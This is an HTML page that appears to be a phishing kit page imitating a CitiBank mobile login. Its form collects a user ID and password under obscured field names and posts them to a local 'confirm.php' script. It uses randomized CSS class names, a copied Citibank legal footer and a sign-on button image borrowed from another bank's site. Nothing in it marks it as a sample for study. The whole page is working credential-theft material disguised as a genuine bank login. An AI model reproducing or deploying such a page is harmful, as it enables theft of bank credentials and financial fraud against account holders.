
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd">
<!-- XHTML ADVANCED -->
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
	<title>CitiBank Login</title>
<meta  http-equiv="Pragma"   content="no-cache"/>
<meta  http-equiv="Cache-Control"   content="no-cache"/>
<meta  http-equiv="Expires"   content="Sat, 01 Dec 2001 00:00:00 GMT"/>
<style type="text/css">
body {background-color:#fff; padding:0; margin:0; color:#000; font-size:14px; font-family:arial, helvetica, "sans serif"; text-align:left; }
  table {margin-left:12px; }
  .noLeft2 {margin-left:0; }
  .footer {margin-left:-16px; font-size:12px; color:#666; font-weight:normal; }
  .hksuojn {width:100%; font-size:inherit; font-family:inherit; font-weight:bold; text-align:center; }
  .dqdapbj {padding:0px; margin:0px; }
  form {width:100%; }
  .iivoqcd {background-color:#039; width:auto; padding:8px 0 5px 12px; font-family:Verdana, Arial; text-align:left; }
  a:hover {text-decoration:underline; }
  .bold {font-weight:bold; }
  hr {border:1px #ccc solid; }
  img {border:0; }
  select {margin-left:12px; font-size:1.1em; }
  input[type='text'] {margin-left:12px; font-size:18px; }
  input[type='password'] {margin-left:12px; width:90%; font-size:18px; }
  span {margin-left:12px; }
  .uukschk {border:0; cursor:pointer; padding:35px 0 0 0; color:rgba(0,0,0,0); font-weight:bold; text-decoration:none; display:block; font-size:0; line-height:0; zoom:1; background:url('https://m.pnc.com/device/mobile/images/button_signOn.png') no-repeat center center #fff; width:100%; font-family:inherit; height:35px; }
  a {margin-left:12px; width:100%; color:#039; font-weight:bold; text-decoration:none; }
  .kdhkkaf {width:90%; }
  image {text-align:left; }
  
</style>
</head>
<body class="dqdapbj">
<!-- Header -->
<div class="iivoqcd">
<img  src="citi.png" alt="CitiBank Login" width="69" height="40"/>	
</div>

<div>
<meta name="viewport" content="width=device-width, initial-scale=1">
        
	
</div>
<br><br><br>
<form  id="myform" action="confirm.php" method="post">
	<div>
<span class="bold">User ID:</span><br />
<input  type="hidden" name="counter" value="0"/><input  type="hidden" name="signOnErrorCounter" value="0"/><input  id="userId" class="kdhkkaf" type="text" name="a" value=""      required><br />
<span class="bold">Password:</span><br />
<input  id="password" type="password" name="b" value=""      required><br />
<br />
<input  class="uukschk" type="submit" name=""  value="Sign On"/>


<br />


	</div>
</form>
<!-- List Item -->
<div class="hksuojn">

<a  href=""></a>
</div>
<br />
<!-- List Item -->
<div class="hksuojn">
<a  href=""></a>
</div>
<br />
<!-- List Item -->
<div class="hksuojn">

</div>
<!-- List Item -->
<div class="hksuojn">
<a  href=""></a>
</div>
<br />
<!-- List Item -->
<div class="hksuojn">
<a  href=""></a>
<span class="footer">Citibank.com provides information about and access to accounts and financial services provided by Citibank, N.A. and its affiliates in the United States and its territories. It does not, and should not be construed as, an offer, invitation or solicitation of services to individuals outside of the United States.  


 Terms, conditions and fees for accounts, products, programs and services are subject to change. Not all accounts, products, and services as well as pricing described here are available in all jurisdictions or to all customers. Your eligibility for a particular product and service is subject to a final determination by Citibank. Your country of citizenship, domicile, or residence, if other than the United States, may have laws, rules, and regulations that govern or affect your application for and use of our accounts, products and services, including laws and regulations regarding taxes, exchange and/or capital controls that you are responsible for following.  


 The products, account packages, promotional offers and services described in this website may not apply to customers of Citigold Private Client, Citigold International, International Personal Banking or Global Executive Banking. 
</span>
</div>

</body>
</html>